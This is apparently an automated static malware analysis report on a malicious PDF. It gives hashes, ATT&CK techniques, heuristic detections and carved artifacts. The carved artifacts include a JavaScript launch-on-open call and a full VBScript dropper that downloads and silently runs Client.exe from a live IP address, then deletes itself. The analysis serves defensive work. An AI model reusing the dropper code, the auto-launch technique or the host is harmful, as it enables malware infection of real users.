Malicious PDF — malware analysis report

Static analysis result for SHA-256 584736cbc92f1c59…

MALICIOUS

PDF

Size: 485.6 KB
Created: 2021-10-28 09:46:45 +05:30
First seen: 2021-11-07
MD5: cd50da2e2895db0725fc154c88025654
SHA-1: 042a5b75b51a13ba1d8e5632d5d3b2e74f8d05ee
SHA-256: 584736cbc92f1c59da17b08e2280ad97f318e221085dc0d11c1c53b27abaec79
Risk score: 396

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1105 Ingress Tool Transfer

This PDF file exploits a known vulnerability (related to CVE-2023-26369) to execute embedded JavaScript. The JavaScript then downloads a second-stage payload named 'Client.exe' from 'http://3.12.41.114/Client.exe', saves it to the user's public directory and executes it. The embedded script also attempts to delete itself after execution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9991

Heuristics (10)

  • PDF_CVE_2023_26369_RELATED (high, CVE related): TrueType bitmap font + active content, CVE-2023-26369 related
    PDF embeds a TrueType font with bitmap tables (EBDT/sbix/CBDT) alongside exploit delivery indicators. CVE-2023-26369 exploits the sfac_GetSbitBitmap function in Adobe's libCoolType for arbitrary code execution. This CVE was actively exploited in the wild, but this rule does not validate the malformed EBLC/EBDT primitive.
  • CLAMAV_DETECTION (critical): ClamAV: Win.Trojan.Generic-9916874-0
    ClamAV detected this file as malware: Win.Trojan.Generic-9916874-0
  • PDF_JAVASCRIPT (low, 3 related findings): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPORT_LAUNCH_DROPPER (critical): exportDataObject + nLaunch, embedded-file launch-on-open dropper
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • PDF_JS_EXPLOIT_CLUSTER (critical): PDF JavaScript exploit cluster
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF_JS (low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_EMBEDDED_SCRIPT_PAYLOAD (high): Embedded script payload in PDF stream
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • EXTRACTED_FILE_STATIC_TRIAGE (medium): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • PDF_EMBEDDED (low): Embedded file
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename: javascript_obj0002_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 2 at offset 0xF
Size: 124 bytes
SHA-256: bcac8109eb29826f54e574b800a732ad77e85e25e51d352d66393fdf50fd7881
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "Invoice.vbs", nLaunch: 2 });
this.exportDataObject({ cName: "Quotation.xll", nLaunch: 2 });
Filename: stream_001_off000010b0.bin
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x10B0
Size: 566784 bytes
SHA-256: 92f3eaf93a1f5906edf08a888a1c35488bfda23acd68985027e16fa0300795a6
Detection
ClamAV: Win.Trojan.Generic-9916874-0
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=stream_001_off000010b0.bin; kind=decompressed-pdf-stream
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS_X64, SC_STR_LOADLIBRARY
Static shellcode analysis recovered API/import strings: LoadLibraryW, GetProcAddress
Filename: stream_003_off000499b5.bin
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x499B5
Size: 570020 bytes
SHA-256: f8e3cfcc65e6efccfe56fe99a19031fe2cee69336756fa45331ac79d59d2dbe8
Filename: embedded_pdf_script_00000ea6.bin
Kind: pdf-embedded-script
Source: PDF decompressed stream script payload at offset 0xEA6
Size: 523 bytes
SHA-256: 79255346b130eb7d9661f540937f48bd837d9bc41d00f2afe25310d9d060338f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
dim pOut, xHttp, bStrm
pOut = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\\Client.exe"
Set xHttp = CreateObject("Microsoft.XMLHTTP")
Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://3.12.41.114/Client.exe", False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile pOut, 2
end with
CreateObject("Wscript.Shell").Run """" & pOut & """", 0, False
CreateObject("Scripting.FileSystemObject").DeleteFile WScript.ScriptFullName